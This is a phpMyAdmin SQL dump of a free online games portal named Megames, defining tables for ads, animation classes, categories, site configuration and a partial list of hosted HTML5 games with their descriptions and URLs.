-- phpMyAdmin SQL Dump
-- version 5.2.2
-- https://www.phpmyadmin.net/
--
-- Hôte : localhost:3306
-- Généré le : ven. 23 jan. 2026 à 16:45
-- Version du serveur : 11.4.9-MariaDB-cll-lve-log
-- Version de PHP : 8.3.29

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Base de données : `yassszch_megames`
--

-- --------------------------------------------------------

--
-- Structure de la table `zon_ads`
--

CREATE TABLE `zon_ads` (
  `id` int(11) NOT NULL,
  `code` mediumtext NOT NULL,
  `ad_name` text NOT NULL,
  `status` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_ads`
--

INSERT INTO `zon_ads` (`id`, `code`, `ad_name`, `status`) VALUES
(1, '<a href=\"\" rel=\"nofollow\"><img alt=\"banner\" src=\"https://landings-cdn.adsterratech.com/referralBanners/gif/700x90_adsterra_reff.gif\" /></a>', '700x100', 0),
(4, '<a href=\"\" rel=\"nofollow\"><img alt=\"banner\" src=\"https://landings-cdn.adsterratech.com/referralBanners/png/80%20x%2030%20px.png\" /></a>', '400x400', 0),
(5, '<a href=\"\" rel=\"nofollow\"><img alt=\"banner\" src=\"https://landings-cdn.adsterratech.com/referralBanners/gif/300x250_adsterra_reff.gif\" /></a>\r\n\r\n', '400x400', 0),
(6, '<a href=\"\" rel=\"nofollow\"><img alt=\"banner\" src=\"https://landings-cdn.adsterratech.com/referralBanners/gif/700x90_adsterra_reff.gif\" /></a>', '700x100', 0);

-- --------------------------------------------------------

--
-- Structure de la table `zon_animation_classes`
--

CREATE TABLE `zon_animation_classes` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_animation_classes`
--

INSERT INTO `zon_animation_classes` (`id`, `name`) VALUES
(1, 'bounce'),
(2, 'flash'),
(3, 'pulse'),
(4, 'rubberBand'),
(5, 'shakeX'),
(6, 'shakeY'),
(7, 'headShake'),
(8, 'swing'),
(9, 'tada'),
(10, 'wobble'),
(11, 'jello'),
(12, 'heartBeat'),
(13, 'backInDown'),
(14, 'backInLeft'),
(15, 'backOutRight'),
(16, 'backOutUp'),
(17, 'bounceIn'),
(18, 'bounceInDown'),
(19, 'bounceInLeft'),
(20, 'bounceInRight'),
(21, 'bounceInUp'),
(22, 'bounceOut'),
(23, 'bounceOutDown'),
(24, 'bounceOutLeft'),
(25, 'bounceOutRight'),
(26, 'bounceOutUp'),
(27, 'fadeIn'),
(28, 'fadeInDown'),
(29, 'fadeInDownBig'),
(30, 'fadeInLeft'),
(31, 'fadeInLeftBig'),
(32, 'fadeInRight'),
(33, 'fadeInRightBig'),
(34, 'fadeInUp'),
(35, 'fadeInUpBig'),
(36, 'fadeInTopLeft'),
(37, 'fadeInTopRight'),
(38, 'fadeInBottomLeft'),
(39, 'fadeInBottomRight'),
(40, 'fadeOut'),
(41, 'fadeOutDown'),
(42, 'fadeOutDownBig'),
(43, 'fadeOutLeft'),
(44, 'fadeOutLeftBig'),
(45, 'fadeOutRight'),
(46, 'fadeOutRightBig'),
(47, 'fadeOutUp'),
(48, 'fadeOutUpBig'),
(49, 'fadeOutTopLeft'),
(50, 'fadeOutTopRight'),
(51, 'fadeOutBottomRight'),
(52, 'fadeOutBottomLeft'),
(53, 'flip'),
(54, 'flipInX'),
(55, 'flipInY'),
(56, 'flipOutX'),
(57, 'flipOutY'),
(58, 'lightSpeedInRight'),
(59, 'lightSpeedInLeft'),
(60, 'lightSpeedOutRight'),
(61, 'lightSpeedOutLeft'),
(62, 'rotateIn'),
(63, 'rotateInDownLeft'),
(64, 'rotateInDownRight'),
(65, 'rotateInUpLeft'),
(66, 'rotateInUpRight'),
(67, 'rotateOut'),
(68, 'rotateOutDownLeft'),
(69, 'rotateOutDownRight'),
(70, 'rotateOutUpLeft'),
(71, 'rotateOutUpRight'),
(72, 'hinge'),
(73, 'jackInTheBox'),
(74, 'rollIn'),
(75, 'rollOut'),
(76, 'zoomIn'),
(77, 'zoomInDown'),
(78, 'zoomInLeft'),
(79, 'zoomInRight'),
(80, 'zoomInUp'),
(81, 'zoomOut'),
(82, 'zoomOutDown'),
(83, 'zoomOutLeft'),
(84, 'zoomOutRight'),
(85, 'zoomOutUp'),
(86, 'slideInDown'),
(87, 'slideInLeft'),
(88, 'slideInRight'),
(89, 'slideInUp'),
(90, 'slideOutDown'),
(91, 'slideOutLeft'),
(92, 'slideOutRight'),
(93, 'slideOutUp');

-- --------------------------------------------------------

--
-- Structure de la table `zon_blog`
--

CREATE TABLE `zon_blog` (
  `id` int(11) NOT NULL,
  `blog_title` text NOT NULL,
  `blog_desc` text NOT NULL,
  `blog_content` longtext NOT NULL,
  `blog_image` text NOT NULL,
  `blog_date` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Structure de la table `zon_category`
--

CREATE TABLE `zon_category` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `slug` mediumtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_category`
--

INSERT INTO `zon_category` (`id`, `name`, `slug`) VALUES
(1, 'Adventure', 'adventure'),
(2, 'Shooting', 'shooting'),
(4, 'Sports', 'sports'),
(5, 'Arcade', 'arcade'),
(7, 'Puzzles', 'puzzles'),
(10, 'Action', 'action'),
(11, 'Cooking', 'cooking'),
(12, 'Racing', 'racing'),
(13, 'Fighting', 'fighting'),
(16, 'Soccer', 'soccer'),
(19, '.IO', '.io'),
(20, 'Puzzle', 'puzzle'),
(21, 'Agility', 'agility'),
(22, 'Dress-up', 'dress-up'),
(23, 'Battle', 'battle'),
(24, 'Casual', 'casual'),
(25, 'Art', 'art'),
(26, 'Simulation', 'simulation'),
(27, 'Racing & Driving', 'racing & driving'),
(28, 'Basketball', 'basketball'),
(29, 'Shooter', 'shooter'),
(30, 'Educational', 'educational'),
(31, 'Jigsaw', 'jigsaw'),
(32, 'Football', 'football'),
(33, 'Bubble Shooter', 'bubble shooter'),
(60, 'Match-3', 'match-3'),
(61, 'SEGA', 'Sega, a pioneer in the gaming industry, has captivated audiences worldwide with its innovative video game consoles, iconic franchises, and unforgettable arcade experiences. Known for legendary characters like Sonic the Hedgehog, Sega continues to push boundaries in gaming and entertainment. With a rich history spanning decades, Sega has delivered classic titles and modern masterpieces, ensuring an unparalleled gaming experience. From its groundbreaking Dreamcast console to modern mobile and PC games, Sega\'s influence remains timeless.'),
(62, 'Nintendo', 'nintendo games'),
(63, 'Hypercasual', 'hypercasual'),
(64, 'Girls', 'girls'),
(65, 'Multiplayer', 'multiplayer'),
(69, 'Clicker', 'clicker'),
(70, 'Care', 'care'),
(71, 'Cards', 'cards'),
(72, 'Mahjong & Connect', 'mahjong & connect'),
(73, 'Strategy', 'strategy'),
(74, 'Merge', 'merge');

-- --------------------------------------------------------

--
-- Structure de la table `zon_comments`
--

CREATE TABLE `zon_comments` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `game_id` int(11) NOT NULL,
  `subject` varchar(2000) NOT NULL,
  `date` varchar(11000) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Structure de la table `zon_config`
--

CREATE TABLE `zon_config` (
  `id` int(11) NOT NULL,
  `site_name` text NOT NULL,
  `profile_tagline` text NOT NULL,
  `site_logo_sm` text NOT NULL,
  `site_logo_light` mediumtext NOT NULL,
  `site_logo_dark` mediumtext NOT NULL,
  `site_favicon` mediumtext NOT NULL,
  `head_code` mediumtext NOT NULL,
  `footer_content` longtext NOT NULL,
  `site_title` text NOT NULL,
  `site_desc` text NOT NULL,
  `site_keywords` text NOT NULL,
  `sidebar_show` int(11) NOT NULL,
  `category_slider_show` int(11) NOT NULL,
  `featured_game_slider` int(11) NOT NULL,
  `popular_views` int(11) NOT NULL,
  `site_color` mediumtext NOT NULL,
  `section_games_limit` int(11) NOT NULL,
  `games_title` text NOT NULL,
  `games_desc` text NOT NULL,
  `play_title` text NOT NULL,
  `play_desc` text NOT NULL,
  `profile_title` text NOT NULL,
  `profile_desc` text NOT NULL,
  `category_title` text NOT NULL,
  `category_desc` text NOT NULL,
  `animate_class` text NOT NULL,
  `cursor_color` text NOT NULL,
  `custom_cursor` int(11) NOT NULL,
  `theme` text NOT NULL,
  `blog` int(11) NOT NULL,
  `gamepix_sid` text NOT NULL,
  `auto_fetch` int(11) NOT NULL,
  `auto_fetch_amount` int(11) NOT NULL,
  `auto_fetch_timing` int(11) NOT NULL,
  `auto_fetch_pub` text NOT NULL,
  `auto_fetch_page` int(11) NOT NULL,
  `auto_fetch_all_games_fetched` int(11) NOT NULL,
  `auto_fetch_game_publisher` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_config`
--

INSERT INTO `zon_config` (`id`, `site_name`, `profile_tagline`, `site_logo_sm`, `site_logo_light`, `site_logo_dark`, `site_favicon`, `head_code`, `footer_content`, `site_title`, `site_desc`, `site_keywords`, `sidebar_show`, `category_slider_show`, `featured_game_slider`, `popular_views`, `site_color`, `section_games_limit`, `games_title`, `games_desc`, `play_title`, `play_desc`, `profile_title`, `profile_desc`, `category_title`, `category_desc`, `animate_class`, `cursor_color`, `custom_cursor`, `theme`, `blog`, `gamepix_sid`, `auto_fetch`, `auto_fetch_amount`, `auto_fetch_timing`, `auto_fetch_pub`, `auto_fetch_page`, `auto_fetch_all_games_fetched`, `auto_fetch_game_publisher`) VALUES
(1, 'Megames - Free Poki Games ', 'Megames – Free Online Games for Everyone', '446329182premium_server.png', '959003552megames.png', 'logo-white.png', '634767850megame1.png', '', '<p>&nbsp;</p><h4>🎮 Play Megames - Free Poki Games&nbsp;</h4><p><br>&nbsp;</p><p><br>Discover the best free online games at <strong>mega games</strong> – your one-stop hub for <strong>multiplayer games</strong>, <strong>3D shooters</strong>, <strong>car games</strong>, and more. No downloads all is free games &nbsp;, no installs, just pure fun with megames poki games have the mega games free &nbsp;it is amazing web site for the game we a lot the games with multiple category games like adventure or sport or puzzle games we have amzing games here !<br>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><ul><li>🔥 Shoot your way in <strong>megames&nbsp;</strong> and <strong>Battle Forces</strong></li><li>🏁 Race in <strong>Rabbids Wild Race</strong> &amp; survive <strong>House of Hazards</strong></li><li>🧠 Solve puzzles with friends in <strong>ZOOM-BE</strong> &amp; <strong>Duo Survival</strong></li><li>🎓 Cause chaos in <strong>Schoolbreak.io</strong></li></ul><p>&nbsp;</p><p>&nbsp;</p><p><br>Play over <strong>1000 free Poki games</strong> anytime like super mario or foot ball game we have nintendo and sega game be free with our site megames ! Our top hits include <strong>Subway Surfers</strong>, <strong>Temple Run 2</strong>, <strong>Stickman Hook</strong>, and <strong>Moto X3M</strong>. Explore new titles added daily all time we add new game poki with different games like super mario , street fiter and game sega nintendo all time we add the new popular games enjoy with this site web game .<br>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p><br>Start your game adventure now with megames &nbsp;free games &nbsp;– no installation just be free in this web site games &nbsp;required just enjoy with your favorite game here!<br>&nbsp;</p><p><br>&nbsp;</p><p>&nbsp;</p>', 'Megames - Play Free Online Poki', 'Play 1000+ free Poki games on Megames. Enjoy multiplayer shooters, puzzle games, car racing..', 'free poki games, online games, multiplayer games, play games free, io games, racing games, puzzle games, megames poki, browser games , megames , super mario\r\n', 1, 1, 1, 10, '#4e4746', 10, '', '', '', '', '', '', '', '', 'flash', '#fff', 0, 'poko', 0, '10605', 0, 90, 1, 'gamepix', 0, 0, '');

-- --------------------------------------------------------

--
-- Structure de la table `zon_featured_games`
--

CREATE TABLE `zon_featured_games` (
  `id` int(11) NOT NULL,
  `game_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Structure de la table `zon_games`
--

CREATE TABLE `zon_games` (
  `id` int(11) NOT NULL,
  `game_name` text NOT NULL,
  `game_description` text NOT NULL,
  `game_image_url` longtext NOT NULL,
  `game_url` longtext NOT NULL,
  `game_published` text NOT NULL,
  `game_category` text NOT NULL,
  `game_status` int(11) NOT NULL,
  `game_played` int(11) NOT NULL,
  `game_banner_url` text NOT NULL,
  `is_featured` int(11) NOT NULL,
  `game_card_size` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_games`
--

INSERT INTO `zon_games` (`id`, `game_name`, `game_description`, `game_image_url`, `game_url`, `game_published`, `game_category`, `game_status`, `game_played`, `game_banner_url`, `is_featured`, `game_card_size`) VALUES
(1, 'MR FUNNY BULLET 2', 'Play MR FUNNY BULLET 2 tap quickly to pass many challenging missions,\nat each level a new shooting slug stage appear.', 'https://img.gamedistribution.com/56fc8c5290ef4c6298a76c8fb8245672-512x340.jpeg', 'https://html5.gamedistribution.com/56fc8c5290ef4c6298a76c8fb8245672/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/56fc8c5290ef4c6298a76c8fb8245672-1280x550.jpeg', 0, ''),
(2, 'Gift Of Alchemy', 'Centuries passed, history became legend,legend became myth and for two thousand years the sacred art of alchemy passed out of all knowledge, stumbling in on one of the remains of the alchemist tomb,destiny has chosen you to rekindle the lost art and revive the era of the Alchemist\\\'s..., Alchemy is based on manipulating and altering matter by using natural energy, this is called Transmutation.    \n', 'https://img.gamedistribution.com/cff40d5d8d654afa8081499fa3a0409d-512x384.jpeg', 'https://html5.gamedistribution.com/cff40d5d8d654afa8081499fa3a0409d/', '0', 'Adventure', 0, 0, '', 1, ''),
(3, 'Tennis Pro 3D', 'Play the most realistic game of Tennis now available in 3D. This game puts you directly in the Tennis court for real action from the opposite end.\n\nThis sports game is packed with real life animations, effects and simulates the game excellently. The unique and fantastic controls along with awesome graphics and design makes this game a must have.', 'https://img.gamedistribution.com/9516118519c248299568900c7829b18e-512x384.jpeg', 'https://html5.gamedistribution.com/9516118519c248299568900c7829b18e/', '0', 'Sports', 0, 0, 'https://img.gamedistribution.com/9516118519c248299568900c7829b18e-1280x720.jpeg', 0, ''),
(4, 'Geometry Dash Crazy', 'Are you ready to show off your skills and cross crazy tracks in Geometry Dash Crazy! There are 3 episodes in the game: \"Orion Planet\", \"Circle Planet\" and \"Crazy Planet\". Choose one of these 3 chapters and see how far you can go! A game with crazy music is waiting for you! Come on then, bounce! Have fun!', 'https://img.gamedistribution.com/8feebdacb2d246ba8c3f4b567502ba2d-512x384.jpeg', 'https://html5.gamedistribution.com/8feebdacb2d246ba8c3f4b567502ba2d/', '0', 'Agility', 0, 0, 'https://img.gamedistribution.com/8feebdacb2d246ba8c3f4b567502ba2d-1280x550.jpeg', 1, ''),
(5, 'Sisters day celebration', 'The lovable sisters Emma and Mia are going to celebrate sisters day. They have to get ready with amazing outfits.Could you help them to choose the suitable outfits. Wish them for happy sisters day!', 'https://img.gamedistribution.com/972ba238f80344b5bb7ec065ef02e5da-512x384.jpeg', 'https://html5.gamedistribution.com/972ba238f80344b5bb7ec065ef02e5da/', '0', 'Dress-up', 0, 0, '', 1, ''),
(6, 'Ancient Fighters', 'Take control of your chosen warrior and fight against mighty ancient.  Make your way to the grand fighter by defeating each opponent fighter.  Sharpen your reflexes and pick a fight in single player or player vs player mode. Good Luck', 'https://img.gamedistribution.com/ea0c374753534f47bc32ddb154bbedf5-1280x720.jpeg', 'https://html5.gamedistribution.com/ea0c374753534f47bc32ddb154bbedf5/', '0', 'Battle', 0, 0, '', 1, ''),
(7, 'Block Wood Puzzle', 'Drag and drop the wooden blocks to fill the gap.\n\nComplete a row to score points. Complete 2 rows or more to score bonus points.\n\nHow high can you score?\n\nFeatures:\n\n- Interactive tutorial\n- Endless gameplay. Play until you run out of turns.\n- Wood theme to encourage focus and productivity.\n- Learn the concept of space management. Fans of tetris and trixology will love this.', 'https://img.gamedistribution.com/2b6a7d0b892f48e99a833968ea5f9dc5-1280x550.jpeg', 'https://html5.gamedistribution.com/2b6a7d0b892f48e99a833968ea5f9dc5/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/2b6a7d0b892f48e99a833968ea5f9dc5-512x512.jpeg', 0, ''),
(8, 'Car Reaction!', 'Car Reaction!', 'https://img.gamedistribution.com/a0456a943ccf4430a7c387ceee4790ed-512x512.jpeg', 'https://html5.gamedistribution.com/a0456a943ccf4430a7c387ceee4790ed/', '0', 'Casual', 0, 0, '', 1, ''),
(9, 'Frankenstein Adventures', 'Frankenstein Adventures is fun addictive adventure game.Collect the stars and cross all the hurdles to the chest.Have fun with this adventurous game. ', 'https://img.gamedistribution.com/14844a5e96244b499af1303efa4b3fab-512x384.jpeg', 'https://html5.gamedistribution.com/14844a5e96244b499af1303efa4b3fab/', '0', 'Adventure', 0, 0, '', 0, ''),
(10, 'Pong', 'Hit the ball with your racket and prevent the opponent from earning you a point.', 'https://img.gamedistribution.com/f9fd5940e65f485e81e6f77e359bbb85-512x384.jpeg', 'https://html5.gamedistribution.com/f9fd5940e65f485e81e6f77e359bbb85/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/f9fd5940e65f485e81e6f77e359bbb85-1280x550.jpeg', 0, ''),
(11, 'BTS Lion Coloring Book', 'BTS Lion Coloring Book is fun coloring game suitable for all ages. This time you can color our lovley lions and become a artist of all time. Have fun playing.', 'https://img.gamedistribution.com/f5b807bb300c4eb1878c4e6d720c32f3-512x384.jpeg', 'https://html5.gamedistribution.com/f5b807bb300c4eb1878c4e6d720c32f3/', '0', 'Art', 0, 0, '', 0, ''),
(12, 'Bus Parking', 'Bus Parking features:\n- multiple levels\n- multiple bus skins', 'https://img.gamedistribution.com/47f1e28d89114dac99b142b4d63031d8-1280x550.jpeg', 'https://html5.gamedistribution.com/47f1e28d89114dac99b142b4d63031d8/', '0', 'Simulation', 0, 0, 'https://img.gamedistribution.com/47f1e28d89114dac99b142b4d63031d8-512x384.jpeg', 0, ''),
(13, 'Fire Bird', 'You will play a bird that flying in the sky and avoid the obstacles.     \nCan you do it for higher score and try to beat your friends along the way?  \nQuick and decisive game, for reaction check!', 'https://img.gamedistribution.com/28408152f1fe41e0870f7d1d3ad280c9-512x384.jpeg', 'https://html5.gamedistribution.com/28408152f1fe41e0870f7d1d3ad280c9/', '0', 'Casual', 0, 0, '', 0, ''),
(15, 'Airplane Parking Mania 3D', 'Become the best pilot and fly your own selected Airport plane to the parking destination.\nExplore the World of airport airplanes and learn parking skills. Parking an huge plane is not so easy, face the difficulties of plane parking on the right slots. Use WASD or Arrows to drive and fly. Mouse to manage Throttle.', 'https://img.gamedistribution.com/7237e6c7cab44fef9c32bbb689bee018-512x384.jpeg', 'https://html5.gamedistribution.com/7237e6c7cab44fef9c32bbb689bee018/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(16, 'Happy Halloween', 'Happy Halloween is fun addictive memory game.Match the 2 same Halloween cards. ', 'https://img.gamedistribution.com/b25464bda7b544ba9dceb4619b609dda-512x384.jpeg', 'https://html5.gamedistribution.com/b25464bda7b544ba9dceb4619b609dda/', '0', 'Casual', 0, 0, '', 1, ''),
(17, 'Rail Blazers Runner', 'Rail Blazers is on of the best free 3D running games. Run on upto 5 lane monorail and subway tracks, as well as water racing tracks.\nThis running game is packed with fresh and new, original and fun, addicting and captivating play features.\nRunning, Surfing, Racing, Speed boat riding, Flying and Hoverin, as well as, the thrilling Bonus rounds!', 'https://img.gamedistribution.com/1bf4a9e0d63b4736b2ccfee207a298d5-512x384.jpeg', 'https://html5.gamedistribution.com/1bf4a9e0d63b4736b2ccfee207a298d5/', '0', 'Agility', 0, 0, '', 1, ''),
(18, 'MR Funny Bullet', 'Are you ready to become a hero, spy, and legend? Solve puzzling challenges, show off your deadly accuracy and take aim at the enemies. Come experience the shooting phenomenon.\nUse your brain in this unique puzzle game.', 'https://img.gamedistribution.com/b4dac12aa8ce471e834df67562fe10c6-512x384.jpeg', 'https://html5.gamedistribution.com/b4dac12aa8ce471e834df67562fe10c6/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/b4dac12aa8ce471e834df67562fe10c6-512x340.jpeg', 0, ''),
(20, 'Floral Manicure Decoration', '<p>I adore nail art! Every four weeks I go to my nail salon and show my nail artist lots of ideas I have gathered from off the internet, we have fun bouncing around ideas and the end result is always stunning! Just by playing this great nail decoration game girls I have another couple of ideas I\'m going to use next time. Why don\'t you play this great nail makeover game and see what designs you can come up with!</p>', 'https://img.gamedistribution.com/070665eba1d54844b790519363ebd3d1-512x384.jpeg', 'https://html5.gamedistribution.com/070665eba1d54844b790519363ebd3d1/', 'Yes', 'Casual', 0, 0, '', 1, ''),
(21, 'Street Fight 3D', 'You are welcome to fight for your survival in this epic game. Goons up your alley, save yourself by beating some thugs along the way. And do not forget to bring gun in this knives fight.   \nRemember no rules in love and war. You are captain and all we have to say is aye aye Captain!', 'https://img.gamedistribution.com/649971e760744d25b8850c3ee0e36d67-512x384.jpeg', 'https://html5.gamedistribution.com/649971e760744d25b8850c3ee0e36d67/', '0', 'Battle', 0, 0, '', 0, ''),
(22, 'Running Ted', 'Run longer than anyone else. Discover Ted\'s wonderful world.', 'https://img.gamedistribution.com/866e070e1b454a32840662dee40ee5f5-512x384.jpeg', 'https://html5.gamedistribution.com/866e070e1b454a32840662dee40ee5f5/', '0', 'Agility', 0, 0, '', 0, ''),
(23, 'Crazy Pixel Warfare', 'Battle against friends with a wide variety of weapons, including bazookas, mini-weapons, axes, shotguns, combat rifles, snipers, RPG and many others!', 'https://img.gamedistribution.com/9670a9c05dd34760b09a6de84d8f10f8-512x384.jpeg', 'https://html5.gamedistribution.com/9670a9c05dd34760b09a6de84d8f10f8/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/9670a9c05dd34760b09a6de84d8f10f8-1280x550.jpeg', 0, ''),
(24, 'Spore Hunter', 'Tap and hold to attack the incoming space spores.\n\nYou only have 3 lives.\n\nFeatures:\n\n- Cool space theme\n- Tap to repair your ship\n- Collect powerups to boost your score', 'https://img.gamedistribution.com/241e9260341e4eb7ba7ce6b0d145aa8d-1280x550.jpeg', 'https://html5.gamedistribution.com/241e9260341e4eb7ba7ce6b0d145aa8d/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/241e9260341e4eb7ba7ce6b0d145aa8d-512x384.jpeg', 0, ''),
(25, 'Pro Cricket Champion', 'Enjoy this new hypercasual cricket series game.\n\nTime your swings to ensure a perfect hit. Do it consistently, but beware of challenges ahead!\n\nFeatures:\n\n- Fast and hypercasual theme\n- User friendly controls on desktop and mobile\n- Real challenging gameplay. You think you have a hang of it, but the game just finds a way to beat you!\n- Can you be the world champion in cricket?', 'https://img.gamedistribution.com/610516946eee45ecb37540d2aec7df85-1280x550.jpeg', 'https://html5.gamedistribution.com/610516946eee45ecb37540d2aec7df85/', '0', 'Sports', 0, 0, 'https://img.gamedistribution.com/610516946eee45ecb37540d2aec7df85-512x384.jpeg', 0, ''),
(26, 'Speed Bumps', 'If you\'re looking for thrilling game experience then you\'re at the right place. Enjoy the best speed bumps game and drive your car on 300+ speed breakers and have an experience of your life time speeding. Not like many other racing cars game, its a different version of speed bump crossing game.', 'https://img.gamedistribution.com/1980254aa1644151a381d7ebf05b8c50-512x384.jpeg', 'https://html5.gamedistribution.com/1980254aa1644151a381d7ebf05b8c50/', '0', 'Casual', 0, 0, '', 0, ''),
(27, 'Basketball Slam Dunk', 'Dunkers features:\n- 1 player or 2 players game mode\n- fun gameplay\n- pixel graphics', 'https://img.gamedistribution.com/2ae97110aae04549a807bdcee9aa3c8d-1280x550.jpeg', 'https://html5.gamedistribution.com/2ae97110aae04549a807bdcee9aa3c8d/', '0', 'Basketball', 0, 0, 'https://img.gamedistribution.com/2ae97110aae04549a807bdcee9aa3c8d-512x384.jpeg', 0, ''),
(28, 'Juice Fresh', 'Nice match 3 game. Swipe on the fruits of the same color to destroy them. \nAt first you have 5 lives.  If you do not pass a level and return to the main menu, you will lose one life. \nThe game has 100 levels and leaderboard. If you have used up all of your lives, just stay turned on in the game  for 7 minutes, to get a new life. You can see the remaining time on the timer at the left top. \n', 'https://img.gamedistribution.com/4e9029276dfb4ec28df7dc9ead8df965-512x512.jpeg', 'https://html5.gamedistribution.com/4e9029276dfb4ec28df7dc9ead8df965/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/4e9029276dfb4ec28df7dc9ead8df965-512x384.jpeg', 0, ''),
(29, 'Zombie Shooter', 'Those stupid zombies are back, and you are humanity\'s last hope to keep them brainless. But beware, ammo is limited so you will have to get crafty and use the straight bullet.\nWe love zombies in our games. Whether you see them as hunks of flesh waiting to be put out of their misery, humans waiting for a cure, or a metaphor for some negative aspect of society, the one thing we can all agree on is that they make fine enemies for shooting games.', 'https://img.gamedistribution.com/5f384882a10f4950804cf432bfab2ad4-512x384.jpeg', 'https://html5.gamedistribution.com/5f384882a10f4950804cf432bfab2ad4/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/5f384882a10f4950804cf432bfab2ad4-1280x720.jpeg', 0, ''),
(30, 'Garden Design Games', 'Garden Design Games features:\n- multiple levels\n- good graphics', 'https://img.gamedistribution.com/f12594034d5e48a6aaf2f2baec35b77e-1280x550.jpeg', 'https://html5.gamedistribution.com/f12594034d5e48a6aaf2f2baec35b77e/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/f12594034d5e48a6aaf2f2baec35b77e-512x384.jpeg', 0, ''),
(31, 'Jumping Horse 3D', 'Jumping Horse 3D is fun addictive arcade game.Its a very interesting horse riding game dodge  all the hurdles to win the game But you should be careful if you hit any of the hurdle you will loose the game.\nHow to Play:\nSpace->Jump\nUp and Down arrow keys->Increase or decrease the speed.\n ', 'https://img.gamedistribution.com/7ae0639bd38e4c4da688395b3edf31aa-512x512.jpeg', 'https://html5.gamedistribution.com/7ae0639bd38e4c4da688395b3edf31aa/', '0', 'Casual', 0, 0, '', 0, ''),
(32, 'FPS Shooter 3D City Wars', 'FPS Shooter 3D City Wars is the most exciting and challenging first-person shooter (FPS) game where you and your team fight against terrorists. No time to hesitate, take real action to dismantle terrorist organizations!', 'https://img.gamedistribution.com/08e88c3fb875479488c5ed76aa5da40d-512x384.jpeg', 'https://html5.gamedistribution.com/08e88c3fb875479488c5ed76aa5da40d/', '0', 'Shooter', 0, 0, '', 0, ''),
(33, 'Kids Classroom Decoration', 'School can become a little dull and mundane! Only if we could change up the classrooms, bringing a little brightness into the place with fun colorings and furnishings! Just like in this game we get the chance to decorate a classroom just how we would like it. Pick out a fun chalkboard, brightly colored flooring and funky looking desks and chairs. I know if school looked like this you would all like to go everyday, right kids!?', 'https://img.gamedistribution.com/7d8cbbc5bef34df8a6f5071244844a9e-512x384.jpeg', 'https://html5.gamedistribution.com/7d8cbbc5bef34df8a6f5071244844a9e/', '0', 'Educational', 0, 0, '', 0, ''),
(34, 'Granny Horror Village', 'Granny Horror Village is a free online first person horror game. You must look at your surroundings and solve a plethora of challenging puzzles to escape. The 3D graphics are cool, and the gameplay is intense!', 'https://img.gamedistribution.com/2a658c392b23482986d1e55ec04b7844-512x384.jpeg', 'https://html5.gamedistribution.com/2a658c392b23482986d1e55ec04b7844/', '0', 'Adventure', 0, 0, '', 0, ''),
(35, 'Track Racer', 'Track Racer is fun addictive truck racing game.Give the direction of your truck with arrow keys and be careful while racing and don\'t dodge with the other trucks.', 'https://img.gamedistribution.com/67ba8bf45064426c837d2fc2441f829b-512x384.jpeg', 'https://html5.gamedistribution.com/67ba8bf45064426c837d2fc2441f829b/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(36, 'Burger Challenge', 'Are burger-lovers and non-sharers here? Try to grab various burgers before your friend! You need to grab the spinning burgers by the middle part. First one to grab 5 burgers on spinning tray wins the game. Also, watch out for the randomly occurring -1 and +1 numbers on the tray, these numbers will determine your end result in + or - points. You may play Burger Challenge game in solo against AI or multiplayer mode. You can use touchscreen controllers or “W” – “Up Arrow” on keyboard. ', 'https://img.gamedistribution.com/5bfeae1204bf42b3a744939855a33e98-512x384.jpeg', 'https://html5.gamedistribution.com/5bfeae1204bf42b3a744939855a33e98/', '0', 'Battle', 0, 0, 'https://img.gamedistribution.com/5bfeae1204bf42b3a744939855a33e98-1280x720.jpeg', 0, ''),
(37, 'Star Girls', 'The beautiful girls Emma and Mia are watching sky and they are very much love the stars on sky. So,they decide to wear star outfits tonight. Could you help them to choose the star themed makeup and outfits? Make them happy! Have a great fun!', 'https://img.gamedistribution.com/889e71c1862c4d12b31b80a41fe5b088-512x384.jpeg', 'https://html5.gamedistribution.com/889e71c1862c4d12b31b80a41fe5b088/', '0', 'Dress-up', 0, 0, '', 0, ''),
